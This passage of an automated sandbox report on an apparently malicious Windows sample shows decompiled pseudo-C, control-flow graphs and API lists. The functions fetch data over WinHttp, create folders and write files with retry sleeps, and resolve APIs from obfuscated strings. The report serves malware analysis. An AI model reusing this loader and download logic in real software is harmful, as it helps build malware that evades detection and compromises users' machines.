      • Part of subcall function 003A1D90: RtlAllocateHeap.NTDLL(00290000,00000008,003A042E), ref: 003A1E72
      • Part of subcall function 00397600: memset.MSVCRT ref: 00397698
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 00394BF0, Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 279sleep

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 500 394bf0-394c4b call 39e520 call 399090 506 394ef8-394efb 500->506 507 394c51-394c87 call 399090 call 3a0c10 500->507 508 394eff-394f01 506->508 507->506 525 394c8d-394c93 507->525 510 394f10-394f15 508->510 511 394f03-394f0c call 39bb40 508->511 515 394f20-394f28 510->515 516 394f17-394f1d call 39bb40 510->516 511->510 517 394f2a-394f30 call 39bb40 515->517 518 394f33-394f41 call 397ad0 515->518 516->515 517->518 528 394c99-394c9b 525->528 529 394eea-394ef4 525->529 530 394ca0-394cab 528->530 529->508 531 394cb9-394cbe 530->531 532 394cad-394cb6 call 39bb40 530->532 534 394ccc-394d06 call 399090 call 3a0c10 531->534 535 394cc0-394cc1 call 39bb40 531->535 532->531 534->506 543 394d0c-394d49 call 39ed90 _time64 534->543 539 394cc6-394cc9 535->539 539->534 546 394d4f 543->546 547 394ed5-394ee4 543->547 548 394d59-394d83 _time64 546->548 549 394d51-394d53 546->549 547->529 547->530 548->547 550 394d89 548->550 549->547 549->548 551 394d8b-394d8d 550->551 552 394d93-394da0 call 3a1840 550->552 551->547 551->552 552->547 555 394da6-394dab 552->555 556 394dad-394db3 call 39bb40 555->556 557 394db6-394dc4 call 39df10 555->557 556->557 562 394dc6-394de9 call 395a10 557->562 565 394deb-394dfa Sleep 562->565 566 394e01-394e06 562->566 565->562 567 394dfc 565->567 568 394e0c-394e11 566->568 569 394f0e 566->569 567->547 570 394efd 568->570 571 394e17-394e34 call 399f70 568->571 569->510 570->508 574 394e3a-394e52 GetFileAttributesW 571->574 575 394ef6 571->575 576 394e92-394ea1 call 391a80 574->576 577 394e54-394e8f CreateDirectoryW 574->577 575->506 579 394ea6-394ec0 _time64 576->579 577->576 579->547 581 394ec2-394ed0 call 392e90 579->581 581->547
    C-Code - Quality: 60%
    			E00394BF0(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v40;
				char _v56;
				char _v256;
				short _v780;
				char _v1304;
				char _v1828;
				intOrPtr _t97;
				void* _t98;
				char _t99;
				void* _t110;
				char _t112;
				void* _t116;
				void* _t117;
				intOrPtr _t118;
				void* _t123;
				intOrPtr _t125;
				void* _t130;
				void* _t137;
				intOrPtr _t139;
				long _t141;
				intOrPtr _t143;
				void* _t157;
				void* _t168;
				void* _t170;
				intOrPtr _t176;
				intOrPtr _t181;
				intOrPtr _t184;
				intOrPtr _t186;
				char* _t192;
				signed int _t193;
				signed int _t195;
				char* _t202;
				char _t208;
				void* _t212;
				void* _t214;
				void* _t216;
				void* _t217;
				void* _t219;
				void* _t226;
				void* _t228;

				_t219 = __eflags;
				_t208 = 0;
				_t214 = __ecx;
				_v12 = 0;
				_v8 = 0;
				_v40 = 0;
				_v20 = 0;
				_v28 = 0;
				_v16 = 0;
				E0039E520( &_v56); // executed
				E00399090(_t219,  &_v256, 0x71);
				_t97 =  *0x3b8628; // 0x593938
				_t217 = _t216 + 8;
				_t98 =  *((intOrPtr*)( *((intOrPtr*)(_t97 + 0x10))))( &_v256, 0x105,  &_v1828, 0, __edi, __esi, __ebx);
				_t220 = _t98;
				if(_t98 == 0) {
					L32:
					_t99 = _v8;
					L34:
					if(_t99 != _t208) {
						E0039BB40(_t99);
						_t217 = _t217 + 4;
					}
					L37:
					_t100 = _v12;
					if(_v12 != _t208) {
						E0039BB40(_t100);
						_t217 = _t217 + 4;
					}
					_t101 = _v16;
					if(_v16 != _t208) {
						E0039BB40(_t101);
					}
					E00397AD0( &_v56);
					return _v28;
				}
				E00399090(_t220,  &_v256, 0x72);
				_t13 = _t214 + 0x10; // 0xa06850ff
				_push( *_t13);
				_t110 = E003A0C10( &_v780, 0x105,  &_v256,  &_v1828);
				_t217 = _t217 + 0x1c;
				if(_t110 < 0) {
					goto L32;
				}
				_v24 = 0;
				if( *((intOrPtr*)(_t214 + 0x20)) <= 0) {
					L30:
					_t99 = _v8;
					_v28 = 1;
					goto L34;
				} else {
					_t157 = 0;
					while(1) {
						_t111 = _v12;
						_v36 = _t208;
						_v32 = _t208;
						if(_v12 != _t208) {
							E0039BB40(_t111);
							_t217 = _t217 + 4;
							_v12 = _t208;
						}
						_t112 = _v8;
						_t224 = _t112 - _t208;
						if(_t112 != _t208) {
							E0039BB40(_t112); // executed
							_t217 = _t217 + 4;
							_v8 = _t208;
						}
						E00399090(_t224,  &_v256, 0x73);
						_t26 = _t214 + 0x28; // 0x5d89ec5d
						_push( *((intOrPtr*)( *_t26 + _t157 + 4)));
						_t116 = E003A0C10( &_v1304, 0x105,  &_v256,  &_v780);
						_t217 = _t217 + 0x1c;
						if(_t116 < 0) {
							goto L32;
						}
						_t192 =  &_v1304;
						_t117 = E0039ED90(_t192, _t208, _t208,  &_v36); // executed
						__imp___time64(_t208);
						_t34 = _t214 + 0x28; // 0x5d89ec5d
						_t118 =  *_t34;
						_t217 = _t217 + 0x14;
						_t168 = _t117 -  *((intOrPtr*)(_t118 + _t157 + 0x10));
						asm("sbb edi, [eax+ebx+0x14]");
						_t193 =  *(_t118 + _t157 + 8);
						_t123 = (_t193 << 4) - _t193 + (_t193 << 4) - _t193 + (_t193 << 4) - _t193 + (_t193 << 4) - _t193;
						asm("cdq");
						_t226 = _t192 - _t193;
						if(_t226 < 0 || _t226 <= 0 && _t168 <= _t123) {
							L29:
							_t125 = _v24 + 1;
							_t157 = _t157 + 0x18;
							_t208 = 0;
							_v24 = _t125;
							_t86 = _t214 + 0x20; // 0xd05d8953
							if(_t125 <  *_t86) {
								continue;
							}
							goto L30;
						} else {
							__imp___time64(0);
							_t39 = _t214 + 0x28; // 0x5d89ec5d
							_t195 =  *( *_t39 + _t157 + 8);
							_t130 = (_t195 << 4) - _t195 + (_t195 << 4) - _t195 + (_t195 << 4) - _t195 + (_t195 << 4) - _t195;
							_t217 = _t217 + 4;
							_t170 = _t123 - _v36;
							asm("cdq");
							asm("sbb edi, [ebp-0x1c]");
							_t228 = _t193 - _t195;
							if(_t228 >= 0 && (_t228 > 0 || _t170 > _t130)) {
								_t43 = _t214 + 0x44; // 0x89c933ff
								if(E003A1840( *((intOrPtr*)( *_t43 + 8))) == 0) {
									goto L29;
								}
								_t133 = _v16;
								if(_v16 != 0) {
									E0039BB40(_t133);
									_t217 = _t217 + 4;
								}
								_t46 = _t214 + 0x44; // 0x89c933ff
								_v16 = E0039DF10( *((intOrPtr*)( *_t46 + 8)));
								_t212 = 0;
								while(1) {
									_t49 = _t214 + 0x28; // 0x5d89ec5d
									_push( &_v20);
									_push( &_v8);
									_t54 = _t214 + 0x44; // 0x89c933ff
									_push( *((intOrPtr*)( *_t49 + _t157 + 4)));
									_push(5);
									_push( *((intOrPtr*)( *_t54 + 8))); // executed
									_t137 = E00395A10(); // executed
									_t217 = _t217 + 0x14;
									if(_t137 != 0) {
										break;
									}
									Sleep(0x1388);
									_t212 = _t212 + 1;
									if(_t212 < 5) {
										continue;
									}
									goto L29;
								}
								_t99 = _v8;
								__eflags = _t99;
								if(_t99 == 0) {
									_t208 = 0;
									__eflags = 0;
									goto L37;
								}
								_t176 = _v20;
								__eflags = _t176;
								if(_t176 == 0) {
									_t208 = 0;
									__eflags = 0;
									goto L34;
								}
								_t60 = _t214 + 0x44; // 0x89c933ff
								_t139 = E00399F70( &_v56,  *((intOrPtr*)( *((intOrPtr*)( *_t60 + 8)))), _t99, _t176,  &_v12,  &_v40); // executed
								__eflags = _t139;
								if(_t139 == 0) {
									_t208 = 0;
									__eflags = 0;
									goto L32;
								}
								_t141 = GetFileAttributesW( &_v780); // executed
								__eflags = _t141 - 0xffffffff;
								if(_t141 == 0xffffffff) {
									_t184 =  *0x3b8628; // 0x593938
									 *((intOrPtr*)( *((intOrPtr*)(_t184 + 0x1e4))))( &_v780);
									CreateDirectoryW( &_v780, 0);
									_t186 =  *0x3b8628; // 0x593938
									 *((intOrPtr*)( *((intOrPtr*)(_t186 + 0x1d8))))( &_v780);
								}
								_t202 =  &_v1304;
								_t143 = E00391A80(_v8, _t202, _v8, _v20); // executed
								__imp___time64(0);
								_t74 = _t214 + 0x28; // 0x5d89ec5d
								_t181 =  *_t74;
								_t217 = _t217 + 0x10;
								__eflags = _a4;
								 *((intOrPtr*)(_t181 + _t157 + 0x10)) = _t143;
								 *((intOrPtr*)(_t181 + _t157 + 0x14)) = _t202;
								if(__eflags == 0) {
									_t80 = _t214 + 0x28; // 0x5d89ec5d
									E00392E90(_t214,  *((intOrPtr*)( *_t80 + _t157 + 4)),  *((intOrPtr*)( *_t80 + _t157)));
								}
							}
							goto L29;
						}
					}
					goto L32;
				}
			}



















































    0x00394bf0
    0x00394bfc
    0x00394bfe
    0x00394c03
    0x00394c06
    0x00394c09
    0x00394c0c
    0x00394c0f
    0x00394c12
    0x00394c15
    0x00394c23
    0x00394c28
    0x00394c2d
    0x00394c47
    0x00394c49
    0x00394c4b
    0x00394ef8
    0x00394ef8
    0x00394eff
    0x00394f01
    0x00394f04
    0x00394f09
    0x00394f09
    0x00394f10
    0x00394f10
    0x00394f15
    0x00394f18
    0x00394f1d
    0x00394f1d
    0x00394f20
    0x00394f28
    0x00394f2b
    0x00394f30
    0x00394f36
    0x00394f41
    0x00394f41
    0x00394c5a
    0x00394c5f
    0x00394c62
    0x00394c7d
    0x00394c82
    0x00394c87
    0x00000000
    0x00000000
    0x00394c8d
    0x00394c93
    0x00394eea
    0x00394eea
    0x00394eed
    0x00000000
    0x00394c99
    0x00394c99
    0x00394ca0
    0x00394ca0
    0x00394ca3
    0x00394ca6
    0x00394cab
    0x00394cae
    0x00394cb3
    0x00394cb6
    0x00394cb6
    0x00394cb9
    0x00394cbc
    0x00394cbe
    0x00394cc1
    0x00394cc6
    0x00394cc9
    0x00394cc9
    0x00394cd5
    0x00394cda
    0x00394ce1
    0x00394cfc
    0x00394d01
    0x00394d06
    0x00000000
    0x00000000
    0x00394d11
    0x00394d19
    0x00394d1f
    0x00394d27
    0x00394d27
    0x00394d2a
    0x00394d2d
    0x00394d33
    0x00394d37
    0x00394d44
    0x00394d46
    0x00394d47
    0x00394d49
    0x00394ed5
    0x00394ed8
    0x00394ed9
    0x00394edc
    0x00394ede
    0x00394ee1
    0x00394ee4
    0x00000000
    0x00000000
    0x00000000
    0x00394d59
    0x00394d5b
    0x00394d63
    0x00394d66
    0x00394d75
    0x00394d77
    0x00394d7a
    0x00394d7d
    0x00394d7e
    0x00394d81
    0x00394d83
    0x00394d93
    0x00394da0
    0x00000000
    0x00000000
    0x00394da6
    0x00394dab
    0x00394dae
    0x00394db3
    0x00394db3
    0x00394db6
    0x00394dc1
    0x00394dc4
    0x00394dc6
    0x00394dc6
    0x00394dcc
    0x00394dd4
    0x00394dd5
    0x00394ddb
    0x00394ddc
    0x00394dde
    0x00394ddf
    0x00394de4
    0x00394de9
    0x00000000
    0x00000000
    0x00394df0
    0x00394df6
    0x00394dfa
    0x00000000
    0x00000000
    0x00000000
    0x00394dfc
    0x00394e01
    0x00394e04
    0x00394e06
    0x00394f0e
    0x00394f0e
    0x00000000
    0x00394f0e
    0x00394e0c
    0x00394e0f
    0x00394e11
    0x00394efd
    0x00394efd
    0x00000000
    0x00394efd
    0x00394e21
    0x00394e2d
    0x00394e32
    0x00394e34
    0x00394ef6
    0x00394ef6
    0x00000000
    0x00394ef6
    0x00394e4d
    0x00394e4f
    0x00394e52
    0x00394e54
    0x00394e67
    0x00394e7b
    0x00394e7d
    0x00394e90
    0x00394e90
    0x00394e9a
    0x00394ea1
    0x00394ea8
    0x00394eae
    0x00394eae
    0x00394eb1
    0x00394eb4
    0x00394eb8
    0x00394ebc
    0x00394ec0
    0x00394ec2
    0x00394ed0
    0x00394ed0
    0x00394ec0
    0x00000000
    0x00394d83
    0x00394d49
    0x00000000
    0x00394ca0

    APIs
      • Part of subcall function 0039E520: CoCreateInstance.OLE32(003B32CC,00000000,00000001,003B32DC,00000000,00396A37,?,00000000), ref: 0039E55C
      • Part of subcall function 0039ED90: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,0039FE81,?,00394D1E,?,00000000,00000000,?), ref: 0039EDB6
    • _time64.MSVCRT ref: 00394D1F
    • _time64.MSVCRT ref: 00394D5B
      • Part of subcall function 00395A10: Sleep.KERNEL32(00009C40,?,?,?,?,?,?,?,00000000,0039FE81), ref: 00395ABF
      • Part of subcall function 00395A10: Sleep.KERNELBASE(00004E20,00000000,0039FE81,757DC426,00000000,00000000,?,?,00000000,0039FE81), ref: 00395B3E
    • Sleep.KERNEL32(00001388), ref: 00394DF0
    • GetFileAttributesW.KERNELBASE(?,0039FE81,00391E57,00000001,0039FE81,?), ref: 00394E4D
    • CreateDirectoryW.KERNELBASE(?,00000000), ref: 00394E7B
      • Part of subcall function 00391A80: CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000002,00000080,00000000,0000001F,00000000,00391BCA,?,003A171D,?,00391BCA,?,?), ref: 00391AAB
      • Part of subcall function 00391A80: WriteFile.KERNEL32(00000000,?,00391BCA,000000CC,00000000,?,003A171D,?,00391BCA,?,?,000000CC), ref: 00391ACD
    • _time64.MSVCRT ref: 00394EA8
      • Part of subcall function 00392E90: GetFileAttributesW.KERNELBASE(?), ref: 00392F93
      • Part of subcall function 0039BB40: HeapFree.KERNEL32(00290000,00000008,003A04E6), ref: 0039BB53
      • Part of subcall function 003A0C10: _vsnwprintf.MSVCRT ref: 003A0C42
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 003B1510, Relevance: 12.1, APIs: 8, Instructions: 119time

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 583 3b1510-3b1532 585 3b1538-3b153d 583->585 586 3b162c-3b1631 583->586 587 3b1549-3b15a3 WinHttpSetTimeouts call 399090 WinHttpOpenRequest 585->587 588 3b153f-3b1546 WinHttpCloseHandle 585->588 589 3b163a-3b1649 586->589 590 3b1633-3b1634 WinHttpCloseHandle 586->590 587->586 593 3b15a9-3b15ac 587->593 588->587 590->589 594 3b15c8-3b15e9 WinHttpSendRequest 593->594 595 3b15ae-3b15c6 WinHttpSetOption 593->595 594->586 596 3b15eb-3b15f8 WinHttpReceiveResponse 594->596 595->586 595->594 596->586 597 3b15fa-3b1615 WinHttpQueryHeaders 596->597 597->586 598 3b1617-3b1629 597->598
    APIs
    • WinHttpCloseHandle.WINHTTP(?), ref: 003B1540
    • WinHttpSetTimeouts.WINHTTP(?,00015F90,00015F90,002932E0,0002BF20), ref: 003B1561
    • WinHttpOpenRequest.WINHTTP(00000004,?,00000004,00000000,00000000,00000000,?), ref: 003B1598
    • WinHttpSetOption.WINHTTP(00000000,0000001F,00000004,00000004), ref: 003B15BE
    • WinHttpSendRequest.WINHTTP(?,?,?,?,?,?,00000000), ref: 003B15E1
    • WinHttpReceiveResponse.WINHTTP(?,00000000), ref: 003B15F0
    • WinHttpQueryHeaders.WINHTTP(?,20000013,00000000,?,00000004,00000000), ref: 003B160D
    • WinHttpCloseHandle.WINHTTP(?), ref: 003B1634
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 003A1D90, Relevance: 12.1, APIs: 8, Instructions: 98library

    Control-flow Graph

    C-Code - Quality: 100%
    			E003A1D90(long _a4, void* _a8) {
				char _v104;
				void* _t14;
				void* _t15;
				void* _t16;
				_Unknown_base(*)()* _t22;
				_Unknown_base(*)()* _t24;
				_Unknown_base(*)()* _t28;
				_Unknown_base(*)()* _t31;
				void* _t32;
				struct HINSTANCE__* _t49;

				_t14 =  *0x3b862c; // 0x290000
				if(_t14 != 0) {
					L7:
					_t32 = _a8;
					if(_t32 == 0) {
						_t15 = RtlAllocateHeap(_t14, 8, _a4); // executed
						return _t15;
					} else {
						_t16 = RtlReAllocateHeap(_t14, 8, _t32, _a4); // executed
						return _t16;
					}
				} else {
					E00396CB0( &_v104, 0x6c);
					_t49 = LoadLibraryA( &_v104);
					E00396CB0( &_v104, 0x6d);
					_t22 = GetProcAddress(_t49,  &_v104);
					 *0x3b8630 = _t22;
					if(_t22 != 0) {
						E00396CB0( &_v104, 0x6e);
						_t24 = GetProcAddress(_t49,  &_v104);
						 *0x3b863c = _t24;
						if(_t24 == 0) {
							goto L2;
						} else {
							E00396CB0( &_v104, 0x6f);
							_t28 = GetProcAddress(_t49,  &_v104);
							 *0x3b8638 = _t28;
							if(_t28 == 0) {
								goto L2;
							} else {
								E00396CB0( &_v104, 0x70);
								_t31 = GetProcAddress(_t49,  &_v104);
								 *0x3b8634 = _t31;
								if(_t31 == 0) {
									goto L2;
								} else {
									_t14 = GetProcessHeap();
									 *0x3b862c = _t14;
									goto L7;
								}
							}
						}
					} else {
						L2:
						return 0;
					}
				}
			}













    0x003a1d93
    0x003a1d9f
    0x003a1e50
    0x003a1e50
    0x003a1e55
    0x003a1e72
    0x003a1e7d
    0x003a1e57
    0x003a1e5f
    0x003a1e6a
    0x003a1e6a
    0x003a1da5
    0x003a1dab
    0x003a1dc3
    0x003a1dc5
    0x003a1dd8
    0x003a1dda
    0x003a1de1
    0x003a1df1
    0x003a1dfe
    0x003a1e00
    0x003a1e07
    0x00000000
    0x003a1e09
    0x003a1e0f
    0x003a1e1c
    0x003a1e1e
    0x003a1e25
    0x00000000
    0x003a1e27
    0x003a1e2d
    0x003a1e3a
    0x003a1e3c
    0x003a1e43
    0x00000000
    0x003a1e45
    0x003a1e45
    0x003a1e4b
    0x00000000
    0x003a1e4b
    0x003a1e43
    0x003a1e25
    0x003a1de3
    0x003a1de3
    0x003a1dea
    0x003a1dea
    0x003a1de1

    APIs
    • LoadLibraryA.KERNEL32(?), ref: 003A1DB7
    • GetProcAddress.KERNEL32(00000000,?), ref: 003A1DD8
    • GetProcAddress.KERNEL32(00000000,?), ref: 003A1DFE
    • GetProcAddress.KERNEL32(00000000,?), ref: 003A1E1C
    • GetProcAddress.KERNEL32(00000000,?), ref: 003A1E3A
    • GetProcessHeap.KERNEL32 ref: 003A1E45
    • RtlReAllocateHeap.NTDLL(00290000,00000008,?,003A042E), ref: 003A1E5F
    • RtlAllocateHeap.NTDLL(00290000,00000008,003A042E), ref: 003A1E72
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 0039FEE0, Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 462

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 619 39fee0-39fef4 call 3994d0 621 39fef9-39fefb 619->621 622 39fefd-39ff10 621->622 623 39ff15-39ff3e _time64 621->623 630 3a0374-3a038a 622->630 624 39ffac-39ffbd call 3a1b80 623->624 625 39ff40 623->625 631 39ffc2-39ffc7 624->631 628 39ff49-39ff58 call 39d890 625->628 629 39ff42-39ff47 625->629 635 39ff5d-39ff62 628->635 629->624 629->628 630->619 636 3a0390-3a03c4 call 3b0a40 call 3b0d30 630->636 633 39ffc9-39ffcc 631->633 634 39fff6-3a0012 631->634 638 39ffde-39fff1 633->638 639 39ffce-39ffdb call 39c870 633->639 642 3a0041-3a0053 call 3942a0 call 3a12c0 634->642 643 3a0014 634->643 640 39ff90-39ffa8 635->640 641 39ff64-39ff67 635->641 674 3a03cc-3a03ef call 391700 call 39f850 call 39c930 636->674 638->630 639->638 640->624 647 39ff79-39ff8b 641->647 648 39ff69-39ff76 call 39c870 641->648 665 3a0058-3a005c 642->665 649 3a001d-3a002b call 39ac90 643->649 650 3a0016-3a001b 643->650 662 3a0372 647->662 648->647 658 3a0030-3a0035 649->658 650->642 650->649 658->630 663 3a003b-3a003e 658->663 662->630 663->642 667 3a005e-3a008f call 399090 * 2 665->667 668 3a0091 665->668 687 3a00f7 call 395a10 667->687 670 3a0093-3a00c4 call 399090 * 2 668->670 671 3a00c6-3a00db call 399090 * 2 668->671 670->687 685 3a00e0-3a00f6 671->685 698 3a04eb-3a04f6 call 399480 call 397e10 ExitProcess 674->698 699 3a03f5-3a0440 call 398030 call 3a1d90 674->699 685->687 690 3a00fc-3a00ff 687->690 692 3a0102-3a0119 _time64 690->692 694 3a011b-3a0128 692->694 695 3a0133-3a0146 call 3936e0 692->695 700 3a012a 694->700 701 3a016b-3a0178 694->701 702 3a014b-3a0164 695->702 734 3a0442-3a044c 699->734 735 3a0495-3a04e9 call 39bb40 699->735 700->695 706 3a012c-3a0131 700->706 704 3a017a 701->704 705 3a01d3-3a01dc 701->705 702->701 707 3a0166 702->707 709 3a017c-3a0181 704->709 710 3a0183-3a01a0 704->710 712 3a028f-3a029c call 399890 705->712 713 3a01e2 705->713 706->695 706->701 707->701 709->705 709->710 710->705 716 3a01a2 710->716 712->662 727 3a02a2-3a02b5 call 395a10 712->727 718 3a01f0-3a020a call 39f2d0 call 3999a0 713->718 719 3a01e4-3a01ea 713->719 723 3a01ab-3a01c3 call 391fe0 716->723 724 3a01a4-3a01a9 716->724 740 3a023f-3a026f call 399090 * 2 718->740 741 3a020c-3a023d call 399090 * 2 718->741 719->712 719->718 733 3a01c8-3a01cd 723->733 724->705 724->723 727->662 743 3a02bb-3a02cc call 397560 727->743 733->705 738 3a0344-3a035b call 3a0ad0 733->738 739 3a0450-3a046c 734->739 735->698 738->674 752 3a035d-3a0367 738->752 755 3a046e-3a0483 739->755 768 3a0270-3a028c call 395a10 call 39bb40 _time64 740->768 741->768 758 3a0369-3a0370 743->758 759 3a02d2-3a02d9 743->759 752->662 766 3a0493 755->766 767 3a0485-3a0490 755->767 758->662 758->674 759->674 764 3a02df-3a02eb 759->764 769 3a02fc-3a0301 764->769 770 3a02ed-3a02fa 764->770 766->735 767->766 768->712 772 3a0303-3a030c 769->772 774 3a0310-3a0318 769->774 770->772 772->774 777 3a031a-3a0330 774->777 778 3a0332-3a033c 774->778 777->774 777->778 778->692 780 3a0342 778->780 780->662
    C-Code - Quality: 47%
    			E0039FEE0() {
				void* _t142;
				intOrPtr _t144;
				signed int* _t145;
				signed int* _t147;
				signed int* _t150;
				void* _t152;
				signed int* _t156;
				intOrPtr _t157;
				signed int* _t159;
				signed int* _t161;
				signed int* _t162;
				intOrPtr _t163;
				void* _t165;
				signed int* _t171;
				signed int* _t172;
				signed int* _t180;
				signed int* _t189;
				signed int _t191;
				signed int* _t192;
				signed int* _t196;
				signed int* _t198;
				intOrPtr _t204;
				signed int* _t210;
				signed int* _t212;
				signed int* _t213;
				signed int* _t215;
				signed int* _t225;
				signed int* _t230;
				intOrPtr _t231;
				signed int* _t232;
				void* _t235;
				int _t238;
				signed int* _t239;
				signed int _t240;
				signed int _t255;
				signed int _t256;
				signed int _t271;
				signed int _t272;
				signed int* _t287;
				signed int _t289;
				signed int* _t292;
				signed int _t293;
				signed int* _t298;
				signed int* _t302;
				signed int* _t304;
				signed int* _t306;
				signed int* _t307;
				signed int* _t308;
				signed short* _t309;
				intOrPtr _t312;
				signed int _t314;
				signed int _t321;
				signed int* _t323;
				signed int* _t324;
				intOrPtr _t325;
				signed int* _t327;
				signed int* _t328;
				void* _t329;
				void* _t330;
				void* _t331;
				void* _t332;
				void* _t333;
				void* _t334;
				void* _t335;

				L0:
				while(1) {
					L0:
					_t292 =  *( *((intOrPtr*)(_t142 + 0x20)) + _t240 * 4);
					_t144 = L003994D0(_t329 - 0x5c0,  *((intOrPtr*)( *((intOrPtr*)(_t142 + 0x1c)) + _t240 * 4)), _t292); // executed
					if(_t144 != 0) {
						goto L4;
					} else {
						_t302 =  *0x3b8628; // 0x593938
						 *(_t302[0x32])(0x3e8);
					}
					L63:
					_t255 =  *0x3b857c; // 0x1
					_t163 =  *((intOrPtr*)(_t329 - 0x5b8));
					_t256 = 1 + _t255;
					 *0x3b857c = _t256;
					_t341 = _t256 -  *((intOrPtr*)(_t163 + 0x18));
					if(_t256 <  *((intOrPtr*)(_t163 + 0x18))) {
						do {
							L0:
							_t292 =  *( *((intOrPtr*)(_t142 + 0x20)) + _t240 * 4);
							_t144 = L003994D0(_t329 - 0x5c0,  *((intOrPtr*)( *((intOrPtr*)(_t142 + 0x1c)) + _t240 * 4)), _t292); // executed
							if(_t144 != 0) {
								goto L4;
							} else {
								_t302 =  *0x3b8628; // 0x593938
								 *(_t302[0x32])(0x3e8);
							}
							goto L63;
						} while (_t256 <  *((intOrPtr*)(_t163 + 0x18)));
						do {
							goto L64;
						} while ( *((intOrPtr*)( *((intOrPtr*)(_t329 - 0x5b8)) + 0x18)) <= _t237);
						continue;
					}
					L64:
					_t165 = E003B0A40(_t323, _t326, _t341, _t329 - 0xc, _t329 - 0x5b8);
					_t335 = _t335 + 8;
					if(_t165 == 0) {
						_t343 =  *(_t329 - 0x20) - _t237;
						if( *(_t329 - 0x20) == _t237) {
							L003B0D30(_t237, _t323, _t326, _t343, _t329 - 0xc, _t329 - 0x5c0);
							_t335 = _t335 + 8;
						}
					}
					 *0x3b857c = 0;
					 *(_t329 - 0x20) = _t237;
					L4:
					__imp___time64(_t235);
					_t323 = _t292;
					_t293 =  *0x3b857c; // 0x1
					_t331 = _t330 + 4;
					_t325 = _t144;
					_t145 = _t144 -  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t329 - 0x5b8)) + 0x24)) + _t293 * 8));
					__eflags = _t145;
					asm("sbb ebx, [ecx+edx*8+0x4]");
					 *(_t329 - 0x48) = _t323;
					if(__eflags < 0) {
						L12:
						_t237 = 0; // executed
						_t147 = E003A1B80(_t325, _t329 - 0xc, _t329 - 0x5c0, _t329 - 0x28); // executed
						_t332 = _t331 + 0xc;
						__eflags = _t147;
						if(_t147 == 0) {
							L16:
							 *(_t329 - 0x20) =  &(( *(_t329 - 0x20))[0]);
							 *((intOrPtr*)( *((intOrPtr*)(_t329 - 0x5bc)) + 0xc)) =  *((intOrPtr*)(_t329 - 0x28));
							_t150 = _t325 -  *((intOrPtr*)(_t329 - 0x3c));
							__eflags = _t150;
							asm("sbb edx, [ebp-0x38]");
							 *(_t329 - 0x48) = _t323;
							if(__eflags < 0) {
								L21:
								E003942A0(__eflags, _t329 - 0x5c0); // executed
								_t333 = _t332 + 4;
								_t152 = E003A12C0(); // executed
								_push(4);
								__eflags = _t152 - _t237;
								if(__eflags >= 0) {
									if(__eflags != 0) {
										_push(_t329 - 0x9c0);
										E00399090(__eflags);
										E00399090(__eflags, _t329 - 0xdc0, 7);
										_push(_t329 - 0xdc0);
										_push(_t329 - 0x9c0);
										_push(0xe);
										_t298 = _t329 - 0x5c0;
										_push(_t298); // executed
									} else {
										_push(_t329 - 0x9c0);
										E00399090(__eflags);
										E00399090(__eflags, _t329 - 0xdc0, 6);
										_push(_t329 - 0xdc0);
										_t298 = _t329 - 0x9c0;
										_push(_t298);
										_push(0xe);
										_push(_t329 - 0x5c0);
									}
								} else {
									_push(_t329 - 0x9c0);
									E00399090(__eflags);
									E00399090(__eflags, _t329 - 0xdc0, 5);
									_t298 = _t329 - 0xdc0;
									_push(_t298);
									_push(_t329 - 0x9c0);
									_push(0xe);
									_push(_t329 - 0x5c0);
								}
								_t156 = E00395A10(); // executed
								_t334 = _t333 + 0x20;
								 *(_t329 - 0x48) = _t237;
								do {
									L27:
									__imp___time64(0);
									_t326 = _t156;
									_t157 =  *0x3b8570; // 0x0
									_t335 = _t334 + 4;
									_t323 = _t298;
									__eflags = _t157 - 2;
									if(_t157 == 2) {
										L31:
										_t159 = E003936E0(_t323, _t326, _t329 - 0xc, _t329 - 0x5c0,  *((intOrPtr*)(_t329 - 0x14)),  *(_t329 - 0x10)); // executed
										_t335 = _t335 + 0x10;
										asm("sbb edx, 0x0");
										 *((intOrPtr*)(_t329 - 0x14)) = _t326 - 0x708;
										 *(_t329 - 0x10) = _t323;
